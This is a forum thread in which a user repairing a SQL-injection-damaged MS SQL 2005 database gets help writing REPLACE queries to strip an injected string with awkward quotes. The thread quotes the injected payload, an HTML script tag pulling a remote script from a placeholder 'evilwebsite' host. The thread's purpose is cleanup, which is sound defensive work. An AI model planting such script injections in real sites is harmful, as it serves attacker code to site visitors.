Armed Polite Society

Main Forums => The Roundtable => Topic started by: 41magsnub on December 14, 2011, 08:13:27 PM

Title: sql geniuses
Post by: 41magsnub on December 14, 2011, 08:13:27 PM

Disclaimer:  I do not manage SQL server for this customer and I know this is bad..  this is to fix the end result of a sql injection attack.  New customer, getting paid to fix and will make recommendations afterwards.  It is in MS SQL 2005

Their backups suck.  They are already working with some web devs to fix the code on their site so this can't happen in the future and I have revamped the backup scheme to something that actually, you know...  backs up somewhere.

There was a sql injection attack, the string:  "></title><script src="http://evilwebsite/file.php"></script><!--  was inserted just before the real data in gobs of fields in multiple tables.  Note the odd number of "'s

I am trying to write a sql replace query to wipe out the evil string with nothing to repair the DB.  It is not ideal but it is what we've got.  However, the jackasses who did the attack are smarter than me in SQL and stuck a " in the string so my commands fail due to the unclosed quotes.  Can one of you geniuses show me how to write a query that will do what I need with the screwy quotes?

I have the infected table up on another server right now to test on.

Title: Re: sql geniuses
Post by: GigaBuist on December 14, 2011, 09:00:12 PM

Code: [Select]

UPDATE tblData
SET txtField = REPLACE(txtField, '"></title><script src="http://evilwebsite/file.php"></script><!--', '');
If you start with single quotes I don't think the double quotes will cause you any trouble.  If they do escape them with a backslash (\):

Code: [Select]

UPDATE tblData
SET txtField = REPLACE(txtField, '\"></title><script src=\"http://evilwebsite/file.php\"></script><!--', '');

Edited post to stick SQL into code blocks.  Should make it easier to tell when I use apostrophe, double quotes, and two apostrophes together.

Title: Re: sql geniuses
Post by: 41magsnub on December 14, 2011, 09:32:41 PM

thanks!  I'll give that a whack.

Title: Re: sql geniuses
Post by: 41magsnub on December 14, 2011, 09:53:46 PM

moot point, the data is pretty static and they are going to roll back to the one backup I found from a couple of months ago.  I'll play with this tomorrow though.

Thanks again!

Title: Re: sql geniuses
Post by: CNYCacher on December 14, 2011, 11:52:11 PM

You were getting tripped up because you were using double quotes around the ting you were searching for.

Let's say that this is the malicious code:
foo"bar

You were trying to match it like this: "foo"bar"
Which was obviously breaking

Get around it by doing this instead: 'foo"bar'
Or this: "foo\"bar"

This will not work: 'foo\"bar'